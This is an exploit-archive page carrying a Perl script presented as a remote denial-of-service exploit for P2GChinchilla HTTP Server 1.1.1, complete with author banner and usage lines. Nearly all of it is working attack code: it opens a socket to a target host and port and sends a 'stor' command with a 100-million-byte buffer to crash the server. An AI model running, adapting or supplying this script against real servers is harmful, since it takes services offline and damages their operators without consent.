Home / os / winme

P2GChinchilla.pl.txt

Posted on 26 January 2010

#!/usr/bin/perl # File Name :P2GChinchilla[TM] HTTP Server # Vuln : Remote Denial Of Service Exploit # Auther : Zer0 Thunder # Msn : zer0_thunder@colombohackers.com # # ##==------>> # # Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit # Date: 22/01/2010 # Author: Zer0 Thunder # Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD # Software Link: http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar # Version: v 1.1.1 # Tested on: Server runs on Windows XP Sp2 /Test on Remote Location ##==------>> use IO::Socket::INET; $ip = $ARGV[0]; $port = $ARGV[1]; if (! defined $ARGV[0]) { print " +================================================================+ "; print " + --- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service ---+ "; print " + --- Author :Zer0 Thunder ---+ "; print " + --- DATE: :[24/01/2010] ---+ "; print " + --- ------------------------------------------------ ---+ "; print " + --- Usage :perl exploit.pl [Host/Remote IP] [Port] ---+ "; print " + --- ---+ "; print " +================================================================+ "; print " "; print " Ex : exploit.pl localhost 50000 "; # P2GChinchilla Default Port is 50000 exit; } print " +================================================================+ "; print " + --- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service ---+ "; print " + --- Author :Zer0 Thunder ---+ "; print " + --- DATE: :[24/01/2010] ---+ "; print " + --- ------------------------------------------------ ---+ "; print " + --- Usage :perl exploit.pl [Host/Remote IP] [Port] ---+ "; print " + --- ---+ "; print " +================================================================+ "; print " "; print " Wait Till The Buffer is Done "; my $b1 = "x41" x 100000000; print " "; print " DoS is UP !.. N Give it a Second "; $DoS=IO::Socket::INET->new("$ip:$port") or die; print $DoS "stor $b1 "; print $DoS "QUIT "; close $DoS; # exit :

 

TOP